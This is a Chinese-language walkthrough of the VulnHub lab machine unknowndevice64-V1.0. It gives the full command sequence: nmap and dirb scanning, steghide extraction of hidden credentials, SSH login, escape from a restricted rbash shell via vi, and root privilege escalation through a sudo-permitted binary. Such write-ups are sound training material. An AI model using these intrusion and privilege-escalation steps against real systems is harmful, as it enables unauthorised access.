vulnhub系列:unknowndevice64-V1.0
一、信息收集
nmap扫描存活,根据mac地址寻找IP
nmap 192.168.23.0/24
nmap扫描端口,开放端口:1337(ssh)、31337(http)
nmap 192.168.23.183 -p- -A -sV -Pn
dirb目录扫描,没什么发现
dirb http://192.168.23.183:31337/
访问31337端口,没什么发现
f12查看源码,发现有一个图片 key_is_h1dd3n.jpg
访问图片,上面写着 隐藏的秘密,可能是图片隐写
将图片下载下来,在kali中使用 steghide 工具提取信息
steghide extract -sf key_is_h1dd3n.jpg
显示需要密码,根据名字可以知道密码为 h1dd3n
h1dd3n
得到一个h1dd3n.txt
查看文件内容,是 brainfuck 加密
使用工具解密,得到账号密码
ud64:1M!#64@ud
二、getshell
登录ssh
ssh ud64@192.168.23.183 -p 1337
1M!#64@ud
发现很多命令被限制,是rbash的shell,双击tab键,查看可执行命令
vi 和 export 命令可用
vi 绕过,还是有部分命令无法执行
vi
按shift+:
!/bin/bash
export 配置环境变量绕过
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
三、提权
查看当前权限
sudo -l
sysud64 可以执行 root 权限的命令,直接尝试提权
sudo sysud64
失败了,sysud64 -h 查看帮助
sudo sysud64 -h
可以使用
-o file send trace output to FILE instead of stderr
尝试提权,提权成功
sudo sysud64 -o /dev/null /bin/bash